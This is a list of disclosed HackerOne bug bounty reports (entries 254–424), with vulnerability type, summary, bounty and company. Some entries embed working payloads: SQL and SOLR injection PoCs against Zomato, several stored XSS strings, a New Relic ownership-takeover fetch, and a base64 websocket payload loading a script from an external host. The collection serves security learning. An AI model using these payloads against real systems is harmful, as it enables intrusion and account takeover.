254CSRFhttps://www.rockstargames.com/reddeadonline/feedback/submit.json was vulnerable to CSRF attacks and could be exploited through a remote server. This attack was only possible through Chrome.$150Rockstar Gameshttps://hackerone.com/reports/796295
255LFILFI of files with .md extension from /var/www/dashboard/new/ was possible. In addition, remote file inclusion from github was possible due to the default value of $docs_path, leading to XSS.$300TTS Bug Bountyhttps://hackerone.com/reports/895972
256Logic BugUnlimited file upload in the image assigned to a contact leads to XSS by uploading malicious SVG.$100Nextcloudhttps://hackerone.com/reports/808287
257CRLF InjectionMalicious users (non-admins) can write to memcached when using a malicious URL as a share.$100Nextcloudhttps://hackerone.com/reports/592864
258HTTP Request SmugglingCL.TE based request smuggling on api.zomato.com leading to account takeover among other issues. This issue was only reproducible when using the DELETE verb. As such, make sure to test for all HTTP verbs when checking for Request Smuggling$5000Zomatohttps://hackerone.com/reports/771666
259XSSReflected XSS on https://www.tumblr.com/abuse/start?prefill=<base64PL>. It only works on Firefox version 69 or lower.$250Automattichttps://hackerone.com/reports/915756
260Logic BugCodeQL query to detect insecure use of postMessage. It checks if indexOf or startsWith is used to check MessageEvent.origin, which can lead to XSS or other issues.$1800GitHubhttps://hackerone.com/reports/920285
261DoSDoS by sending many requests to apply for a certain job, due to relying on responses from a 3rd party server before returning.$100Maximumhttps://hackerone.com/reports/892615
262Session FixationAn issue where not all sessions being terminated when the password was reset.$50Moneybirdhttps://hackerone.com/reports/743518
263Improper authenticationhttps://werkenbijderet.nl/vacature-alert endpoint did not have proper rate limiting implemented, leading to being able to send thousands of mails within 10 minutes.$100Maximumhttps://hackerone.com/reports/882942
264SSRFBeing able to call all internal classes, functions and parameters due to everything being declared public. This leads to blind SSRF through Gopher protocol.$300TTS Bug Bountyhttps://hackerone.com/reports/895696
265IDORRead only user can delete other users through IDOR$50Heliumhttps://hackerone.com/reports/888729
266Brute ForceIt is possible to brute force the login prompt of app.mopub.com due to only having IP based rate limiting. It should have CAPTCHA or block all access to the locked out account, not just add restrictions to the violating IP (as changing IPs is easy).$420Twitterhttps://hackerone.com/reports/819930
267XSSReflected XSS in GET parameter$300Mail.ruhttps://hackerone.com/reports/848742
268Improper access controlA partner’s superuser account could access information of drivers belonging to other partners, including passport and drivers license data$8000Mail.ruhttps://hackerone.com/reports/863983
269Information leakBot Token for ICQ was leaked in GIT commit data for opensource JIRA plugin$150Mail.ruhttps://hackerone.com/reports/902064
270Logic bugIt was possible to create accounts with nicknames belonging to existing accounts$150Mail.ruhttps://hackerone.com/reports/824973
271XSSViewing a malicious SVG lead to access to local files (LFI?) on certain iOS versions due to cross-application scripting in the Mail.ru iOS Mail app$1000Mail.ruhttps://hackerone.com/reports/900543
272Race ConditionMalicious applications could create multiple valid OAUTH sessions by abusing a race condition.$250Razerhttps://hackerone.com/reports/699112
273IDORIDOR in the stocky application allows for changing columns of other users$750Shopifyhttps://hackerone.com/reports/853130
274Account TakeoverIf staff/the store owner has yet to register a google account to his Shopify ID, and you have privileges to change their registered email, you can take over the account by setting their email to your gmail address. Knowing this means you can takeover accounts by having the admin be exposed to an xss performing this operation. It only works with Google Apps enabled.$2000Shopifyhttps://hackerone.com/reports/892904
275Improper authenticationThe Stocky application did not have any permission checks to download purchase orders, leading to anyone being able to download the orders.$500Shopifyhttps://hackerone.com/reports/802286
276CRLF InjectionIn the Synthetics “Ping” functionality, you can insert newline characters, resulting in almost full control over the email functionality. You are able to send emails to anyone, with any content. The only limitation is a small one in the “Subject” field.$500New Relichttps://hackerone.com/reports/347439
277IDORThe selectAddressId in the cookie combined with the delivery_subzone in the GET request, allows for unauthenticated enumeration of all addresses registered to users. This cannot be tied to a specific user. This is due to the backend disclosing the full, stored address of a user, given that the delivery_subzone matches that associated with the selectAddressId without any further authentication$1500Zomatohttps://hackerone.com/reports/514897
278Logic bugDue to not sufficiently protecting which apps can retrieve the token in the authentication flow, it is possible for a malicious application to take over the account of the user. This requires a malicious app preinstalled on the victims device to be successful.$500Shopifyhttps://hackerone.com/reports/855618
279Improper authenticationAn attacker can generate app tokens through the adminGenerateSession mutation in the admin panel, as a staff member with no permissions. This would give access to a small subset of installed apps, limited to the current shop.$2000Shopifyhttps://hackerone.com/reports/898528
280XSSStored XSS in admin interface through “evaluation of purchase process”-window$1500Mail.ruhttps://hackerone.com/reports/874387
281DoSCertain files in /etc/ are writable. For example hosts, hostname and resolve.conf. While the last two seems to have special handling, /etc/hosts is inherently vulnerable. This leads to being able to DoS a service by writing large amounts of data to the file.$1000Kuberneteshttps://hackerone.com/reports/867699
282Logic bugGraphQL query for finding incorrect hostname comparison. This is especially prevalent in Android applications.$1500GitHubhttps://hackerone.com/reports/929288
283Logic bugMisconfiguration lead to being able to get SmartDNS for free for longer than it should be.$700NordVPNhttps://hackerone.com/reports/925757
284XXEXXE on starbucks.com.sg/RestAPI/* leading to arbitrary file read$500Starbuckshttps://hackerone.com/reports/762251
285Account TakeoverDue to improper authentication when setting up 2FA, it is possible to takeover an account given that you know the USER ID. This is not likely to leak and as such reduces the impact of this vulnerability.$100Heliumhttps://hackerone.com/reports/810880
286Information DisclosureIt was possible to view thumbnails of private videos through attacking the API$750Pornhubhttps://hackerone.com/reports/138703
287DoSImproper handling of renaming HackerOne groups for managing access rights for programs, leads to excessive resource use which may lead to DoS$2500HackerOnehttps://hackerone.com/reports/880187
288DoSDoS through recursive evaluation. Can be done remotely by an attacker with elevated privileges.$200Kuberneteshttps://hackerone.com/reports/882923
289Logic bugBy tampering requests regarding which retailers you can earn cashback from to be an empty list, you can earn cashback from all retailers on the platform. Normally premium users can only select 6 and normal users can only select 3. This can only be set once, but using this vulnerability you can switch at any time.$1000Curvehttps://hackerone.com/reports/672487
290Use of weak PRNGGrammarly Keyboard for Android used weak PRNG allowing a malicious app installed on the device to guess the PKCE code value and steal the OAUTH access token of a user. Fixed by changing to SecureRandom$2000Grammarlyhttps://hackerone.com/reports/824931
291Improper AuthenticationH1 SAML implementation allows for re-using SAML response for up to 10 minutes, allowing for increased risk in case an attacker can ever intercept or otherwise compromise such a request.$500HackerOnehttps://hackerone.com/reports/888930
292DoSDoS of account (for Chrome) when viewing a tweet containing the link twitter.com/%00$560Twitterhttps://hackerone.com/reports/921286
293IDORIDOR allows user to access pictures from other users, including EXIF data.$200IRRCloudhttps://hackerone.com/reports/906907
294Information leakAfter the policy_markdown_html was added inside the team Graphql query, it was possible to enumerate if public programs also had private programs. In case they did, you could also see their internal policy.$2500HackerOnehttps://hackerone.com/reports/877642
295PhishingAbility to spoof interface elements through adding tags or attributes in calendar events at calendar.mail.ru$150Mail.ruhttps://hackerone.com/reports/847473
296Code injectionCodeQL query for detecting possible template injections in Python$2300Githubhttps://hackerone.com/reports/944359
297XSSBy adding a link in a post and manually editing out a portion (denied:), then reblogging the post, the XSS will execute after the victim clicks the link (on the reblogged post).$350Automattichttps://hackerone.com/reports/882546
298Command InjectionSince GitLab allows for code injection through Mermaid, you can achieve arbitrary PUT requests in the context of the victim through this command injection. The victim has to have the required privilege to perform the action for the attack to succeed.$3000Gitlabhttps://hackerone.com/reports/824689
299SQLiAn SQL Injection existed in a Razer Gold asset due to using an outdated instance of PHPlist. The injection point is the body parameter name and not the value!$2000Razerhttps://hackerone.com/reports/824307
300Code injectionDue to a vulnerability in how the executable launched related executables, it was possible to escalate privileges by abusing this issue. (Likely similar to DLL injection or unquoted path issues.) The issue was in a Cortex related service.$750Razerhttps://hackerone.com/reports/769684
301IDORAn alternate site shared database and cookie credentials with card.starbucks.com.sg. By exploiting the alternate site, the hacker could copy over the cookie value and take over the account on starbucks.$6000Starbuckshttps://hackerone.com/reports/876300
302Command injectionAWS S3 bucket takeover of multiple buckets. The buckets were still referenced in a test script and as such could have resulted in RCE.$12,500Mapboxhttps://hackerone.com/reports/329689
303CSRFLogin CSRF via OATH code in lootdog.io allows an attacker to replace a user’s session with the attackers session.$150Mail.ruhttps://hackerone.com/reports/892986
304DoSDue to relying on AJV, and also using allErrors:true, Fastify is vulnerable to DoS when there is potentially slow matching patterns or if uniqueItems is in the schema.$250Node.js third-party moduleshttps://hackerone.com/reports/903521
305DoSBy submitting a very long password, the hashing algorithm on the server will take a lot of resources and potentially result in DoS due to memory exhaustion.$100Nextcloudhttps://hackerone.com/reports/840598
306Information DisclosureDue to lack of access control in ajaxgetachievementsforgame, it is possible to see achievement names, display names and descriptions for unreleased games if you find a user who has the achievements for those unreleased apps (beta tester or similar)$750Valvehttps://hackerone.com/reports/835087
307Open RedirectReverse tabnabbing (changing location of the original page page when opening a link in a new tab) was possible in the printing source document images functionality.$100Visma Publichttps://hackerone.com/reports/911123
308Client side enforcement of Server-side SecurityDue to silently ignoring the content length header, it is possible to bypass the size check for S3 buckets and upload attachments of any size. The solution is to add content-length header to whitelisted headers.$500Ruby on Railshttps://hackerone.com/reports/789579
309Logic bugWhen creating a hash, the permit function does not sufficiently protect when converting using .each(), allowing for sneaking in additional parameters that should not logically be present$500Ruby on Railshttps://hackerone.com/reports/292797
310Null pointer dereferenceA lack of proper checks for user supplied data results in a null pointer dereference.$1500Open-Xchangehttps://hackerone.com/reports/827729
311Use After FreeDue to incorrectly decreasing a reference counter, by sending a lot of newline characters (“\n”) you can reach code checking the cmd-variable which has previously been freed.$500Open-Xchangehttps://hackerone.com/reports/827051
312IDORAccount takeover through IDOR in password recovery procedure$1500Mail.ruhttps://hackerone.com/reports/843160
313IDORCould disclose attributes of arbitrary sites due to a IDOR in relap.io$750Mail.ruhttps://hackerone.com/reports/749887
314XSSBy uploading a PNG with JS and XML code, and adding it to a Wiki page, it was possible to achieve stored XSS$1500GitLabhttps://hackerone.com/reports/880099
315Improper Access ControlLack of access control on the ListMembers query allowed for enumeration of members in private lists. Finding the TwitterID is difficult, but can be done by brute force by attacking different endpoints. To further show impact, it was demonstrated that x-response-time header discloses if the lists exists or not.$2940Twitterhttps://hackerone.com/reports/885539
316XSSStored XSS through the blob-viewer. The payload is in the description field.$2000GitLabhttps://hackerone.com/reports/806571
317SSRFChaining redirects in grafana allows for SSRF using any HTTP verb to any arbitrary endpoint. For more information, see Rhynorater’s talk at HactivityCon 2020.$12,000GitLabhttps://hackerone.com/reports/878779
318Logic bugBy supplying an attacker controlled link, the attacker can get a copy of the PoC, if the victim (person creating a poc) submits the details on the page. There were multiple bypasses possible due to a loosely configured regex, which was fixed.$1000BugPochttps://hackerone.com/reports/926221
319Logic bugDue to lack of association checks between 3rd party wallet IDs and user IDs, it was possible to purchase Zomato Gold memberships using other user’s 3rd party wallets, effectively having them pay for it.$2000Zomatohttps://hackerone.com/reports/938021
320Logic bugAbility to decrease payment by maximum 1 currency unit (0.99) for any purchase$150Zomatohttps://hackerone.com/reports/927661
321Improper access controlAccess control issue due to not correctly checking permissions in the active session for the user$100Visma Publichttps://hackerone.com/reports/812143
322Information leakAbility to see error message related to character encoding from SQL operation by adding the poop-emoji to the email field during registration$100Unikrnhttps://hackerone.com/reports/866271
323SQL InjectionSOLR injection through adding \to the query.$100Zomatohttps://hackerone.com/reports/844428
324SQL InjectionBlind SQLi in res_id of /php/geto2banner. PoC is res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END&city_id=0$2000Zomatohttps://hackerone.com/reports/838855
325SQL InjectionSame as #326, but on a different endpoint: /php/widgets_handler.php. PoC: :/php/widgets_handler.php?method=getResWidgetButton&res_id=51-CASE/**/WHEN(LENGTH(​version()​)=​10​)THEN(SLEEP(6*1))END$2000Zomatohttps://hackerone.com/reports/836079
326Improper access controlThe food.grammarly.io site uses Meter framework, and is lacking proper authorization for sensitive endpoints. The attacker could leak user data and employee data, including access tokens, by calling the functions directly from JS (for example in dev tools)$1000Grammarlyhttps://hackerone.com/reports/745495
327SQL InjectionThe reporter identified a SOLR injection on the user_id parameter at :/v2/leaderboard_v2.json. This had low impact, but the internal team found a boolean based blind SQLi in the same codebase when investigating and rewarded the report as such.$2000Zomatohttps://hackerone.com/reports/952501
328Special element injectionSOLR injection similar to #324, but on a different endpoint. PoC :v2/red/homepage.json?lat=&lon=&city_id={!dismax+df=city_id}86&android_country=US&lang=en&android_language=en$150Zomatohttps://hackerone.com/reports/953203
329Missing authorizationMissing authorization checks lead to a user only allowed to do sales being able to record payments he was not supposed to$250Visma Publichttps://hackerone.com/reports/919008
330SSRFCodeQL query for detecting SSRF issues in Golang libraries and code$1800Github Security labhttps://hackerone.com/reports/956296
331LDAP InjectionCodeQL query for detecting LDAP injections in Java, supporting Java JNDI, UnboundID, SPring LDAP and Apache LDAP API$2500Github Security labhttps://hackerone.com/reports/956295
332XSSStored XSS through the chartbuilder in one.newrelic.com. Payload: SELECT '“><img src=x onerror=alert(document.domain)> "' Style=position\' FROM SyntheticCheck$2500New Relichttps://hackerone.com/reports/634692
333Information leakAble to view full name of users who are not yet part of your account. This can be achieved by creating a note, viewing it and trying to share it with the invited account.$750New Relichttps://hackerone.com/reports/476958
334Privilege escalationRestricted users are able to delete Key transaction tags through the GUI even though they should only have READ-access.$750New Relichttps://hackerone.com/reports/638685
335Privilege escalationAn unrestricted user is able to view the application token for a mobile app by directly visiting the /deploy endpoint for the app.$500New Relichttps://hackerone.com/reports/479139
336IDORAccess to a subset of a victims Insights Dashboards through a GraphQL query with insufficient validation$1500New Relichttps://hackerone.com/reports/765565
337Logic bugAbility to buy PRO subscriptions for reduced prices by tampering the pr. unit price$203.5New Relichttps://hackerone.com/reports/783688
338Improper access controlRestricted users are able to delete NerdStorage documents created/owned by any user on that account, through GraphQL query.$600New Relichttps://hackerone.com/reports/766145
339Improper access controlA restricted user was able to update the Aodex target for an application by abusing a GraphQL mutation without proper validation and authorization$626New Relichttps://hackerone.com/reports/776449
340Violation of secure design principlesIt was not possible to delete API keys in the application, even though the GUI said it was possible and the action succeeded. This was true even for users with an Admin/Owner role.$500New Relichttps://hackerone.com/reports/782703
341Code injectionBy abusing a CSRF vulnerability in the admin panel, the reporters were able to achieve stored XSS. Then, using the stored XSS vulnerability, they managed to escalate the vulnerability to RCE. The attack required Social Engineering of a WordPress Admin (to click the initial link) to be successful$506New Relichttps://hackerone.com/reports/941421
342Improper access controlA test endpoint for Synthetic monitors was found by the reporter. It did not validate permissions of the user, causing low privileged users to be able to create monitors using Secure Credentials$500New Relichttps://hackerone.com/reports/788499
343IDORThe reporter found a way to link an account with any Partnership as long as the ID was known. It was resolved by adding proper validation.$695New Relichttps://hackerone.com/reports/786109
344XSSStored XSS in the Synthetics private locations list. Both the Label and Description fields were vulnerable. PoC: </script><script>alert(document.domain)</script>$2500New Relichttps://hackerone.com/reports/680240
345Improper access controlRestricted users are able to create, edit and remove tags from the NerdGraph entities.$750New Relichttps://hackerone.com/reports/757957
346XSSStored XSS in the “Position” field when applying for “Support/Moderator” jobs at recruit.innogames.de$500Innogameshttps://hackerone.com/reports/917250
347IDORAn endpoint for testing Synthetics monitors without proper validation allowed monitors from other accounts to run on your account, given that they knew the monitors ID (on victims account)$2500New Relichttps://hackerone.com/reports/787886
348XSSStored XSS across accounts through the embedded charts page. The vulnerable field is chart_title and the PoC is: </script><script>alert(document.domain)</script>. Multiple bypasses was also found for this issue$3625New Relichttps://hackerone.com/reports/709883
349XSSStored XSS in the transactionName field of the Beta map functionality. PoC is a simple "-alert(document.domain)-"$2500New Relichttps://hackerone.com/reports/667770
350XSSCross account stored XSS by injecting the payload into a chart, when it is displayed inside a note. The exploit abuses the href attribute by using a javascript:alert()" payload. This XSS requires no user interaction.$4250New Relichttps://hackerone.com/reports/507132
351Improper access controlThere was a misconfiguration in CORS-policy where all assets trusted the domain nr3.nr-assets.net where users can upload arbitrary content. (For example Nerdlet artifacts) This allows an attacker to upload malicious files of arbitrary types and execute arbitrary actions on behalf of the victim in various ways due to the incorrect configuration. Valid fixes are either to move user content to another sandbox domain or to amend the CORS policy.$3125New Relichttps://hackerone.com/reports/751699
352Information disclosureCORS misconfiguration allows requests from sandbox containing user apps, leading to potential disclosure of nerdpacks, nerdlets, and launcher ID’s, and also source code of the victims app.$625New Relichttps://hackerone.com/reports/746786
353XSSStored XSS in admin interface when creating a new alert. By formatting the url as: user:password@domain.com the server accepts the payload, which is: javascript:fetch("https://rpm.newrelic.com/user_management/accounts/{ACCOUNT_ID}/update_primary_admin?value={ATTACKER_ID}",{method:"PUT",headers:{"X-Requested-With":"XMLHttpRequest"}}).then(function(_){alert("you_have_lost_your_ownership");close()})//@asd.com$1337New Relichttps://hackerone.com/reports/605845
354Memory CorruptionMissing best practices like having ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention) and CFG (Control Flow Guard) enabled is lacking$50Nextcloudhttps://hackerone.com/reports/380102
355DoSDenial of Service by poisoning the cache with invalid CORS Header, due to an endpoint echoing back and setting the CORS Allow-OriginHeader to the supplied “origin” value.$200Automattichttps://hackerone.com/reports/921704
356XSSWhen connecting to an invalid website, it launches a pop-up which can contain attacker-controlled content. By using file-scheme, for example, you can trick users into launching arbitrary files on the local machine$100Nextcloudhttps://hackerone.com/reports/685552
357Path TraversalThe linux client is vulnerable to an attack where an administrator can inject path traversal payloads into filenames (../) in order to write files to arbitrary locations within the control of the nextcloud app, on the victims machine. It only allows for creating new files, not modify existing ones, and needs to be continously exploited to have effect.$250Nextcloudhttps://hackerone.com/reports/590319
358SSRFSSRF in PlantUML staging server, due to accepting the !include function.$100GitLabhttps://hackerone.com/reports/689245
359XSSStored XSS due to improper filtering of attributes after admin has edited them.$650WordPresshttps://hackerone.com/reports/633231
360XSSStored XSS due to improper filtering of attributes after admin has edited them. Different case from #359$650WordPresshttps://hackerone.com/reports/497724
361XSSStored XSS in First and Last Name field for “Staff” account$3000Shopifyhttps://hackerone.com/reports/948929
362Privilege EscalationAn attacker can register an account with an email, get permissions and then be deleted. After being deleted, by accessing accounts.shopify.com with the now deleted account, you still have access.$1000Shopifyhttps://hackerone.com/reports/870001
363Information disclosureA bug in graphql access controlled allowed an attacker with “customer” permissions to leak additional data they should not have access to, from orders.$1500Shopifyhttps://hackerone.com/reports/882412
364Information disclosureBy first getting an API key, then querying for specific data, staff members can access data they are not supposed to have access to.$1000Shopifyhttps://hackerone.com/reports/901775
365Information disclosureUsers without any permission can access certain store information through GraphQL query.$500Shopifyhttps://hackerone.com/reports/409973
366XSSReflected XSS through the skuNo & skuImgUrl parameters at https://www.istarbucks.co.kr/app/getGiftStock.do$250Starbuckshttps://hackerone.com/reports/768345
367Improper access controlPassword reset link can be used to reset password multiple times.$500Shopifyhttps://hackerone.com/reports/898841
368IDORThe last 4 digits of a registered credit card could be obtained through error messages on the /profile_payment/saveendpoint by abusing an IDOR$500Yelphttps://hackerone.com/reports/361984
369IDORAn IDOR allowed an attacker to order food on GrubHub by using someone elses credit card on the /checkout/transaction_platform endpoint.$2500Yelphttps://hackerone.com/reports/391092
370IDORAn IDOR on the /rewards/signup endpoint allowed an attacker to associate a random credit card to their account. While it could not be used. it allowed for viewing the transaction history and cash back amounts received$2000Yelphttps://hackerone.com/reports/358143
371Stack overflowHalf Life 1 allows taking arguments from command-line to launch a mod/specific game. This is done through -game <arg>. The argument is copied using strcopy resulting in an overflow being possible.$1150Valvehttps://hackerone.com/reports/832750
372Buffer OverflowBy loading a malicious map-file (.bsp) an attacker can achieve RCE on any victim, if they load the map. This works on any GoldSrc game$450Valvehttps://hackerone.com/reports/763403
373Buffer OverflowThe spk console command has no length check before copying it into a stack based buffer, leading to being able to achieve RCE by having a victim load a malicious .cfg file.$350Valvehttps://hackerone.com/reports/769014
374IDORAn IDOR when creating shipping labels allows an attacker to request print labels (and I assume see the information related to the order) for stores he does not have access to.$1000Shopifyhttps://hackerone.com/reports/884159
375Improper authenticationThe getLoginStatus call in Digits allows an attacker to retrieve OAuth Credentials for any account, due to improperly verifying domains by utilizing the referer header. If this header was empty, the application considered the request valid, which was the issue.$5040Twitterhttps://hackerone.com/reports/168116
376Information disclosureCodeQL query to detect logging of potentially sensitive information in JS based applications$1800Github Security Labhttps://hackerone.com/reports/963816
377Information disclosureCodeQL query to detect basic authentication over HTTP in java.net and Apache HttpClient libraries. This is vulnerable due to basic auth only using base64 encoding and being easily reversible.$2300Github Security Labhttps://hackerone.com/reports/963815
378DoSLodash V.4.17.15 was vulnerable to prototype pollution, allowing for potential DoS.$250NodeJS 3rd party moduleshttps://hackerone.com/reports/864701
379Privacy ViolationClickjacking was possible during the payment process, leading to an attacker being able to trick the victim into paying for items using their stored credit card.$400Yelphttps://hackerone.com/reports/391385
380UI Redressing (Clickjacking)Multiple endpoints were vulnerable to clickjacking.$500Yelphttps://hackerone.com/reports/305128
381UI Redressing (Clickjacking)Clickjacking was possible on the /reservations endpoint, possibly allowing an attacker to leak information of a victim or incurring monetary loss for the victim$500Yelphttps://hackerone.com/reports/355859
382Information disclosureIt is possible to disclose all details about all pentesters invited to a test, regardless if they accepted or not. This allows leaking sensitive information.$500HackerOnehttps://hackerone.com/reports/958374
383XSSStored XSS through the dashboard builder within New Relic One.$2500New Relichttps://hackerone.com/reports/626082
384Privilege EscalationSynthetics did not have the matching permissions compared to other functionality, allowing for users to have higher privileges than intended.$750New Relichttps://hackerone.com/reports/387290
385Privilege EscalationDue to changing to use Zuora for managing customer subscriptions, members who do not have such access through the New Relic platform, can access the information through the Zoura API.$900New Relichttps://hackerone.com/reports/501672
386XSSStored XSS via role name in JSON chart, which was part of a prerelease UI. Payload was: /*\"<sVg/oNloAd=alert(document.domain)//>\x3e$2500New Relichttps://hackerone.com/reports/520630
387Improper authenticationRestricted users were able to delete filter sets used by admin users in https://infrastructure.newrelic.com/accounts/{{ACC#}}/settings/filterSets$250New Relichttps://hackerone.com/reports/202501
388Privilege escalationBy being invited as a staff member and becoming a partner, then revoking said permission, the previous account still has access to the partner store (? Hard to understand from report)$1500Shopifyhttps://hackerone.com/reports/911857
389XSSIt is possible to achieve stored XSS when creating a menu item. The XSS fires when you try to delete said item.$1000Shopifyhttps://hackerone.com/reports/887879
390Information disclosureStaff members with No Permission could not access data through web, but by using the Android application the member can access Order Details via the exchangeReceiptSend call$1000Shopifyhttps://hackerone.com/reports/917875
391Privilege escalationA malicious admin can create additional admin accounts without notifying / it being visible to other admins.$500Shopifyhttps://hackerone.com/reports/962895
392Path traversalIt is possible to use path traversal in order to access arbitrary paths on the OAuth app as an anonymous user$500Shopifyhttps://hackerone.com/reports/869888
393Violation of secure design principlesIf you change country information in Account settings, hackerone does not send you a “Your profile was recently changed” notification email.$500Hackeronehttps://hackerone.com/reports/961841
394Information disclosureBy fetching a valid token from another store, it was possible to bypass the password-restriction on stores in preview mode.$1500Shopifyhttps://hackerone.com/reports/961929
395XSSBy setting the name of the folder containing a broken theme to a XSS payload, XSS can be achieved. This requires installing an attacker-supplied theme or write-access to the file system.$300WordPresshttps://hackerone.com/reports/406289
396XSSSelf-xss on Timeline by using javascript: protocol$500Shopifyhttps://hackerone.com/reports/854299
397Improper access controlScript Editor tokens do not expire and thus, scripts can still be edited and added if you have the token, even if the Script Editor application is uninstalled. The scripts can also no longer be seen or edited unless manually accessing/calling the API if the script is renamed to an empty character.$2000Shopifyhttps://hackerone.com/reports/915940
398Information disclosureWithin the same company, it was possible to access data one should not be able to, when having the Auditor role.$100Visma Publichttps://hackerone.com/reports/959897
399Privilege EscalationBy navigating directly to the relevant endpoints instead of relying on the UI, and restricted user is able to create integrations with AWS, even though his role forbids this.$750New Relichttps://hackerone.com/reports/255685
400Privilege EscalationBy logging in to New Relic Synthetics with no permissions, observing calls allows you to identify a call returning all data about the monitor’s and permissions for the group.$750New Relichttps://hackerone.com/reports/320689
401IDORBy adding a new user to your New Relic account as an admin, you are able to disclose their full name on the https://alerts.newrelic.com/accounts/ACCOUNT_ID/channelspage$1500New Relichttps://hackerone.com/reports/344309
402IDORWhen creating an account for a new user, the admin cannot see the name of the account holder. This vulnerability allowed an attacker to disclose such data through the API endpoint https://alerts.newrelic.com/internal_api/1/accounts/YOURACCOUNTNUMBER/users/$1500New Relichttps://hackerone.com/reports/332381
403Improper access controlIf a permanent maintainer creates a mirror then removes it, any other project maintainer can create a mirror that is similar to the first one created. This is contrary to what documentations states and can allow an attacker to plant backdoors or push to a repository after being removed from the project.$3000GitLabhttps://hackerone.com/reports/819821
404IDORBy creating an account on customers.gitlab.com, then linking it to the victims account by using their userId (it is sequential and easy to get), you will: 1. Remove all subscriptions, 2. Get access to all future updates, including credit card registration!, 3. Attacker can use registered information.$3500GitLabhttps://hackerone.com/reports/674195
405Privilege EscalationIf a gitlab admin uses the impersonate function, the admin cookie will be replaced with the user cookie and have a “Stop impersonating” button available to return to the admin account. This session shows up in the sessions overview of the user, so if the user switches to this session, he can click the “Stop impersonating”-button and get admin access.$10,000GitLabhttps://hackerone.com/reports/493324
406Logic bugAn attacker was able to run arbitrary pipeline jobs as the victim. By creating a repository and a mirrored project with trigger pipelines for mirror updates enabled, and then inviting the victim as an owner, then deleting the original owner, the pipeline will execute in the context of the victim account.$12,000GitLabhttps://hackerone.com/reports/894569
407XSSStored XSS in groups, by naming the group as an XSS payload – "><img src=x onerror=prompt(123)> – and clicking New Project$2500GitLabhttps://hackerone.com/reports/647130
408Improper access controlThe jira_status field has an issue with sort_by allowing an attacker to see if a report is using Jira or not.$550Hackeronehttps://hackerone.com/reports/955286
409XSSStored XSS on eaccounting.stage.vismaonline.com$250Visma Publichttps://hackerone.com/reports/897523
410CSRFDue to disclosing part of the authenticity token used to generate csrf tokens. Using this, an attacker can generate valid CSRF tokens for any arbitrary route.$500Ruby on Railshttps://hackerone.com/reports/732415
411Improper access controlAbility to publish any theme for free, by extracting the ID of the paid theme, and then intercepting the update to a free theme and replacing that ID with the ID of the paid theme.$2000Shopifyhttps://hackerone.com/reports/927567
412Improper access controlAbility to publish any theme for free, by race condition when installing the theme. This is done by finding a paid theme and clicking the Try theme button. Then, while it is installing, issuing the PublishLegacy call for a free theme. Then intercept and modify the first GraphQL Query to ThemesProcessingLegacy where you replace the theme ID with the paid theme ID.$2000Shopifyhttps://hackerone.com/reports/953083
413XSSFile upload with a unicode character and XSS payload causes the webpage created to execute the script$600WordPresshttps://hackerone.com/reports/179695
414Code injectionXSS to RCE by uploading html as part of a snippet. The map-function allows arbitrary inclusion of resources, leading to being able to execute any command. There are also multiple issues with storage of payloads in Slack’s environment, leading to being able to host code on trusted domains.$1750Slackhttps://hackerone.com/reports/783877
415XSSDue to taking unsantizied input from websockets and rendering it on the recipients side, it is possible to achieve XSS on support desk conversations and gain access to support tickets and client information. The payload was: ws.send('{"action":"send_message","data":{"type":2,"uuid":"katO0xuiIy","media_thumb":"xxdata\\" onerror=\\"eval(atob(\'dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vcGl0ci54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7\'));//","media_url":"media-url"},"uuid":"katO0xuiIy","token":"bz+OjfTeBL/BRozszXwKbT10voEb0crFVRWBktvQifQ=","projectId":1,"messengerType":9}')$500QiWihttps://hackerone.com/reports/512065
416Improper authenticationDue to improper parsing and display of the from address, it was possible to send emails from any @mail.ru address while passing DKIM and DMARC verification, even though the email is spoofed. The bug happens when there are two “From” headers and the incorrect, but spoofed address is added as “From: “. This attack is also a replay-attack where you require a previously sent and verified email from the address provider.$150Mail.ruhttps://hackerone.com/reports/731878
417IDORIDOR in dictor.mail.ru allowed an attacker to get any video information through GraphQL query$2500Mail.ruhttps://hackerone.com/reports/924914
418Information disclosureConfig files were accessible for warofdragons.my.games, leaking database credentials and other information$150Mail.ruhttps://hackerone.com/reports/786609
419CRLF injectionwww.starbucks.com/email-prospectt was vulnerable to CRLF injection allowing for header injection (for example injecting CORS headers) or HTTP response splitting, which can be further exploited.$250Starbuckshttps://hackerone.com/reports/858650
420XSSIt is possible to achieve stored XSS if an attacker can upload files using Active storage, by utilizing the proxy-functionality included in Ruby on Rails.$500Ruby on Railshttps://hackerone.com/reports/949513
421XSSIt was possible to achieve stored XSS in the Post title on Imgur. This was achieved using a standard "><svg payload.$250Imgurhttps://hackerone.com/reports/942859
422Logic bugEmail bypass for shopify accounts that did not have Shopify IDs. This allowed an attacker to exploit a flaw in the flow, allowing for taking over these accounts without any verification.$22,500Shopifyhttps://hackerone.com/reports/867513
423Information leakAnonymous access to a Sidekiq process dashboard was possible on shopper.sbermarket.ru$500Mail.ruhttps://hackerone.com/reports/951190
424DoSBrowser-dependent DoS by injecting invalid link: http://twitter.com:627732462

The Bug Bounty is a github repository by Robin